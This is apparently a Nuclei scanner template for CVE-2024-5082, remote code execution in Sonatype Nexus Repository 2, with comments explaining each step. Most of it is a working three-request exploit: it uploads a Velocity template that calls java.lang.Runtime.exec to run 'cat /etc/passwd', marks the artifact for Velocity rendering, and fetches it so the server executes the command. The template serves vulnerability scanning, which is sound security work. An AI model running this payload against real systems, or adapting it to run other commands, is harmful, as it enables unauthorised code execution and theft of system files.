Vulnerability description (漏洞描述)
A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1. The Nuclei template below reproduces it as an authenticated, intrusive three-step check (upload a Velocity template as a Maven artifact, mark it with the `velocity` content generator, then fetch it so the server renders and executes it).
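# Nuclei template for CVE-2024-5082: authenticated remote code execution in
# Sonatype Nexus Repository 2 via a user-controlled Velocity
# "contentGenerator" attribute on an uploaded artifact.
#
# How the check works (the three raw requests below, run in order via `flow`):
#   1. PUT a Velocity template as a Maven artifact into the hosted `releases`
#      repository (expects HTTP 201).
#   2. PUT an attributes entry for that artifact that sets
#      contentGenerator=velocity (expects HTTP 201).
#   3. GET the artifact; the server now renders it through Velocity, which
#      executes the embedded command and returns its output as text/plain.
#
# Operational caveats a tester should know before running this:
#   - Credentials are mandatory: pass `-var username=... -var password=...`.
#     The account must be able to upload to the `releases` repository; there
#     is no unauthenticated detection path in this template.
#   - The check is intrusive AND persistent: steps 1 and 2 write an artifact
#     (com/sbt/ignite/ignite-bom/maven-metadata.xml) plus its attributes file
#     into the target repository. Remove both after testing.
#   - The payload runs `cat /etc/passwd` on the target and the matched body
#     ends up in nuclei's output; treat results as sensitive data.
#   - The repository ID `releases` and the artifact path are hard-coded; an
#     instance that has no hosted repository with that ID produces a false
#     negative rather than an error.
#   - NOTE(review): a hosted release repository configured to forbid
#     redeploys may reject a second upload of the same path, so re-running
#     against the same target may fail at step 1 — confirm on the target.
#   - NOTE(review): the trailing `# digest:` line is a signature over the
#     original template bytes; any edit (including these comments and the
#     description/tag fixes) invalidates it, so re-sign the template or drop
#     the line before running with signature verification enabled.
#
# Reconstruction note: the page this was taken from had all indentation and
# the header/body blank lines stripped. Indentation follows the standard
# nuclei layout and the empty line separating headers from body has been
# restored in each raw request — without it the Velocity payload would be
# sent as malformed HTTP headers instead of as the request body.

id: CVE-2024-5082

info:
  name: Nexus Repository 2 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2. This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
  reference:
    - https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/
    - https://support.sonatype.com/hc/en-us/articles/30694125380755
  classification:
    epss-score: 0.12225
    epss-percentile: 0.93612
  metadata:
    verified: true
    # Three requests are sent per target, all of them authenticated.
    max-request: 3
    shodan-query: html:"Nexus Repository"
  # `sonatype` is the vendor's name; the legacy misspelling `sonartype` is
  # kept so existing `-tags sonartype` filters still select this template.
  tags: cve,cve2024,intrusive,nexus,sonatype,sonartype,vkev

# Requests are chained: each later step only runs if the previous one matched.
flow: http(1) && http(2) && http(3)

variables:
  username: "{{username}}"
  password: "{{password}}"
  # Joined here once so every request can reuse the same Basic-auth value.
  credentials: "{{ username + ':' + password }}"

http:
  # Step 1: upload the Velocity payload as a Maven metadata file. The body is
  # Velocity markup (`#set` lines are Velocity directives, not YAML comments —
  # they live inside the block scalar). It reflects java.lang.Runtime through
  # the class loader, runs the command, and echoes its stdout as $output.
  - raw:
      - |
        PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Authorization: Basic {{base64(credentials)}}
        Content-type: text/xml

        #set($engine="")
        #set($run=$engine.getClass().forName("java.lang.Runtime"))
        #set($runtime=$run.getRuntime())
        #set($proc=$runtime.exec("cat /etc/passwd"))
        #set($null=$proc.waitFor())
        #set($istr=$proc.getInputStream())
        #set($chr=$engine.getClass().forName("java.lang.Character"))
        #set($output="")
        #set($string=$engine.getClass().forName("java.lang.String"))
        #foreach($i in [1..$istr.available()])
        #set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))
        #end
        $output

    # 201 Created confirms the artifact was stored; `internal` keeps this
    # intermediate match out of the reported findings.
    matchers:
      - type: status
        internal: true
        status:
          - 201

  # Step 2: write the artifact's attributes entry so Nexus serves the file
  # through the Velocity content generator. The double slash before
  # `.nexus/attributes` is intentional and must be preserved.
  - raw:
      - |
        PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(credentials)}}
        Content-type: application/json

        {"contentGenerator":"velocity"}

    matchers:
      - type: status
        internal: true
        status:
          - 201

  # Step 3: fetch the artifact. A vulnerable server renders it with Velocity
  # and returns the command output; both matchers must hit to report.
  - raw:
      - |
        GET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(credentials)}}

    matchers-condition: and
    matchers:
      # The root entry of /etc/passwd proves the command actually executed.
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      # Velocity-rendered output comes back as text/plain rather than as the
      # uploaded text/xml; this rules out the raw file being echoed back.
      - type: word
        part: content_type
        words:
          - "text/plain"
# digest: 490a0046304402203df329b81462a32bfc68a76bf6239d007b1b738ecaf64f78e8635504ace2f2fd0220105d88c75497c12156cc96f72dd58b55da0595dc6f049335e2b80191e5ad640f:922c64590222798bb761d5b6d8e72950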